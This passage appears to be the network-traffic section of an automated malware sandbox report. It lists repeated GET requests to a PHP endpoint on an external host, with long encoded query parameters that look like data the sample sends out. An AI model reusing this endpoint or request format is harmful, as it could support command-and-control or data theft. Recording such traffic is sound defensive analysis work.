QMlGNyQmd1ITY1ZFbJZTSDJ2cGJDZspEWhdkSDxUaJhlWrVzVa1mVHJ1ZNNDZ2JVbiBHZslkNJl3YxoEWhJDbHRWdGtWSzlUaOlkUW5kWKl2TpRjMiBnTuNGbaFTVQx2aRl2dplUeBRlT4tGVNRTQE5Ue0MkTyk0aMlXTU5EMJpWTwkkaMdlQE1UdFRUT5NmVUdlSp9UaVdlYoVDMVBFbrFVa3lWS5VlaNh3aU1EMNpmTzUkeNlXSE1EeJl2TpFVVTtmSYlldK12Ysh2RkZXMrl0cJNEVNxmeRZkTVZFSWp2Vp9maJlnVtNWMSNTWop1VkVnRXR1aKhVW2pUbjxGaHRmdxsWSzlUaO1EaVR1MRZkVxUURSl2bqlEbxcVWPJVbjhWOtlVeWdUYwkzVUl2dplEeJhlWzhnMilnUuJmdOBjYsJ1VhdlSp9UaRd1Us50VhJjVHJlVCFjUpdXaJZDaFlEMZpWS2k0UaBjRtV1bOhlW5p1VaNFaYllTWZUVIp0QMlWTuNmd4JjYqJUaOVTS65kMrRkT1kEROd2ZIlEMJRUT4F0QldWQE9UeFpWS2kUaiZHbHR2ds12Yq5EWaVkVHpldxAjYsJ1VhdlVGVFSKNETplEMSdWRqlkNJNVZ5lzVixWMwIGbSdVYXZlRVhkSDxUaRVkTTRmeNl2bqlUe5IzY6ZlMZZnSIVldWdkWwplVWFFZrl0cJNlTp9maJxmSYRGMOdlWww2RhpmSYFldWdkWwplVWFFZrl0cJlmV4VFMRVFZrlkNJNlW0ZUbUZlQxIVa3lWSFJFVRFzZq5EenRUT1kUaPlWUXNVe5IzY6ZlMZZnSIVlVCFTUpdXaJdXVGVFRKl2TpF1VTxmTXFmMWdkUWJUMRl2dD1kNJlmY2xmMjBnWYp1UWZUVEp0QMl2bINlTCNUT3FkaNl2bql0aWdlW35UMhpWOHJGRS5mYspkbjFjTVZVUOtWSzl0URZHNrlkNJNkWsZ1RjRFdykld4JTUzZUbilnVHRGNWVlVR50aJNXSpFFc0VUS3FFROhXWqlkNJNlW2wmMVxGaykFaOBTTNZlRVRkSDxUaJVVYMJ0QPBTQq1UavpWSsBHWhRlVHFmaGJTU5dXVWFlTrl0cJN1Tp9maJxmSYRGMOdlWww2RhpmSYFlVCFTUpd3UNZTS5NWe5IzY6ZlMZZnSIV1cGJTWwRmMi1kVGVFRKNETw8maJpnVtNmdOVlVR50aJNXSD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXNVavpWS1lzVhBjQYFWeOJzYsJVVWFlTrl0cJlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiImNjNwgDZyEDMwkjYjVDN4ETNyITM4EGNlRWY4EWM1ADMjFjMzIjM2IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMisHL9JCMYZWaNhlYndmeOl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=d1nIVtGVQJFMJJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIyIjNwQjZykTOmVmZilDZmF2N2ITZldjZ1gzMyImZmJGZlFTM3gTYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=QX9JiI6ISZxgTM3IGOwUWZwIzNwkzYwgTM2E2MkJzN4gDOiNTNlJCLiQzM5ImMmJWZyYTYyMTOyEGM5QGZkVzN4ETN4YjMmFjY4YWMkdjNjVmI6IiMxEWYjZWZmZ2YjJzMkVTMwcTNkZmM0YTMyIGNkRmZjJCLiYGN2UmM4IWM1czY5czYjFTMmdzMkN2MjRzNwQmZyQGOyAzM2IGO0kjI6ICOjJmNmdDZ3MWZjBjN5EGOjZWZ3MDM1ITZhJmYzEDNxIyes0nIRZWOKl3Y0JUaOFTRqlkNJN0T0UlaZ1mSE5keJJTWsZkeOlmTq10aS1mTo50RahXWUp1akRlWrpVbZpmWUp1djpmWwk0Ral2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUS6NGVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5